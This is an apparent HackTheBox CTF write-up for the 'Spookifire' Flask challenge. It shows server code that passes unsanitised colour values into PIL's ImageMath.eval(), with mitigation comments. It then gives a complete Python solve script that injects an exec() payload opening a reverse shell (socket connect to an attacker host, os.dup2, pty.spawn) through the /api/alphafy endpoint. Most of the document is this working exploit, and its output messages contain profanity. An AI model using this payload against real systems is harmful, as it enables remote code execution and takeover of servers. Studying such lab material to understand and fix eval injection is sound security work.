


Spookifire is a Python Flask challenge on Hackthebox.

Description:

This challenge takes as input an image value (base64-encoded) and an array of colors.

The problem is that the colors are passed to an eval function without being sanitized.

Source code:


zip password: hackthebox

Vulnerable code:

from PIL import Image, ImageMath
# It uses the PIL module to generate a new image, but the problem is that `ImageMath.eval()` can execute Python code.
# Server-side snippet from the challenge.  The three `color` components are
# formatted straight into an ImageMath expression string, so whatever the
# client sent becomes part of the expression that ImageMath.eval() evaluates.
# Mitigation: validate/coerce each component to int before formatting it into
# the expression, or compute the per-band difference with ImageChops.difference
# instead of building an expression string from request data.
alpha = ImageMath.eval( # the expression below is evaluated by ImageMath.eval()
			f'''float(
				max(
				max(
					max(
					difference1(red_band, {color[0]}), <== here you can see that color being passed without sanitizing to eval().
					difference1(green_band, {color[1]})
					),
					difference1(blue_band, {color[2]})

				),
			)''',
		)

Solve:


import requests
import base64
import argparse

def send_post_request(image_path, local_url, ip):
    """Post an image plus a crafted ``background`` array to the challenge API.

    Reads ``image_path``, base64-encodes it and sends it together with a
    ``background`` list whose first element is a string rather than a colour
    component.  Presumably the server formats that element into the
    ImageMath expression shown in the vulnerable snippet above without
    validating it; the proper server-side fix is to check every ``background``
    element is an int before it is interpolated into the expression.

    Args:
        image_path: path of the image file to read and base64-encode.
        local_url: host string written into the payload.
        ip: despite the name, this is the port written into the payload
            (``__main__`` passes ``args.port``).  It must already be a str,
            because it is concatenated into the payload string.

    Returns:
        None.  The HTTP status code and response body are printed.
    """
    with open(image_path, "rb") as img_file:
        image_data = img_file.read()
        image_base64 = base64.b64encode(image_data).decode('utf-8')

    # NOTE(review): the request target is hard-coded; ``local_url`` and ``ip``
    # only end up inside the payload string, never in the URL.
    url = 'http://localhost:1337/api/alphafy'
    payload = "exec('import os,pty,socket;s=socket.socket();s.connect((\"" + local_url + "\"," + ip + "));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")')"
    print(payload)
    # The string above is sent as the first ``background`` element; the other
    # two are ordinary integer colour components.
    payload = {
        "image": image_base64,
        "background": [
            payload,
            2,
            162
        ]
    }

    headers = {
        'Content-Type': 'application/json',
    }

    response = requests.post(url, json=payload, headers=headers)

    # Only the status code is inspected; a 200 alone does not show what the
    # server did with the ``background`` value.
    if response.status_code == 200:
        print("Done!, wait don't tell me that you didn't receive your fucking reverse shell")
        print("Response:", response.text)
    else:
        print("This shit didn't work")
        print("Status Code:", response.status_code)
        print("Response:", response.text)


if __name__ == "__main__":
    # CLI entry point: three positional arguments, handed to send_post_request
    # in the order it declares them.
    arg_parser = argparse.ArgumentParser(
        description='Send a POST request with an image base64 payload.'
    )
    for arg_name, help_text in (
        ('image_path', 'Path to the image file'),
        ('local_url', 'revshell url'),
        ('port', 'revshell port'),
    ):
        arg_parser.add_argument(arg_name, help=help_text)
    cli_args = arg_parser.parse_args()

    send_post_request(cli_args.image_path, cli_args.local_url, cli_args.port)

